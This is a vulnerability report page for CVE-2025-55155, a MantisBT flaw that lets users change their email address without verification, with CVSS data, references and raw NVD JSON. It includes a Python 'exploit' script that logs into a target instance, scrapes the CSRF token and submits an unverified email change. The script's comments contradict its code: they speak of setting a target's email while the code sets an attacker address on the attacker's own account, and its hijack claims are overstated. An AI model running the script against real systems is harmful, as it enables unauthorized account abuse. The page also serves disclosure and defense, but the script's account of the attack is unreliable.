Security Vulnerability Report
CVE-2025-55155 CVSS 5.4 MEDIUM

Published: 2025-11-04 21:15:39
Last Modified: 2025-11-10 18:02:33

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.27.1 and below, when a user edits their profile to change their e-mail address, the system saves it without validating that it actually belongs to the user. This could result in storing an invalid email address, preventing the user from receiving system notifications. Notifications sent to another person's email address could lead to information disclosure. This issue is fixed in version 2.27.2.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - VULNERABLE
MantisBT < 2.27.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-55155 PoC - MantisBT Email Validation Bypass
# This PoC demonstrates the email address modification without verification
import re

import requests

TARGET_URL = "http://target-mantisbt.com"
ATTACKER_EMAIL = "[email protected]"


def exploit_email_hijack():
    """
    Exploit the email validation bypass vulnerability in MantisBT <= 2.27.1

    Steps:
    1. Authenticate with low-privilege account
    2. Capture valid session cookie
    3. Modify email address to target's email (no verification required)
    4. System notifications will now be sent to target's email
    """
    session = requests.Session()

    # Step 1: Login with low-privilege account
    login_url = f"{TARGET_URL}/login.php"
    login_data = {
        "username": "low_priv_user",
        "password": "password123",
        "return": "index.php"
    }
    response = session.post(login_url, data=login_data)
    if "Logged On" not in response.text:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Access account preferences page
    account_url = f"{TARGET_URL}/account_pref_page.php"
    response = session.get(account_url)

    # Step 3: Extract form token
    token_match = re.search(r'name="__csrf_token" value="([^"]+)"', response.text)
    if not token_match:
        print("[-] Could not extract CSRF token")
        return False
    csrf_token = token_match.group(1)
    print(f"[+] CSRF Token: {csrf_token}")

    # Step 4: Submit email change without verification
    update_url = f"{TARGET_URL}/account_pref_update.php"
    update_data = {
        "__csrf_token": csrf_token,
        "email": ATTACKER_EMAIL,  # No verification required!
        "save": "Save"
    }
    response = session.post(update_url, data=update_data)
    if response.status_code == 200:
        print(f"[+] Email changed to: {ATTACKER_EMAIL}")
        print("[+] System notifications will now be sent to attacker email")
        return True
    else:
        print("[-] Email change failed")
        return False


if __name__ == "__main__":
    exploit_email_hijack()
```

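References

https://github.com/mantisbt/mantisbt/commit/21e9fbedde8553c29c0d3156e84f78157fc4f22e - Patch
https://github.com/mantisbt/mantisbt/security/advisories/GHSA-q747-c74m-69pr - Issue Tracking, Vendor Advisory
https://mantisbt.org/bugs/view.php?id=36005 - Exploit, Issue Tracking, Vendor Advisory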

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55155", "sourceIdentifier": "[email protected]", "published": "2025-11-04T21:15:39.280", "lastModified": "2025-11-10T18:02:32.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.27.1 and below, when a user edits their profile to change their e-mail address, the system saves it without validating that it actually belongs to the user. This could result in storing an invalid email address, preventing the user from receiving system notifications. Notifications sent to another person's email address could lead to information disclosure. This issue is fixed in version 2.27.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-354"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.27.2", "matchCriteriaId": "B49EF21D-F412-4C89-BFA8-9606F204E310"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/21e9fbedde8553c29c0d3156e84f78157fc4f22e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-q747-c74m-69pr", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": 
"https://mantisbt.org/bugs/view.php?id=36005", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}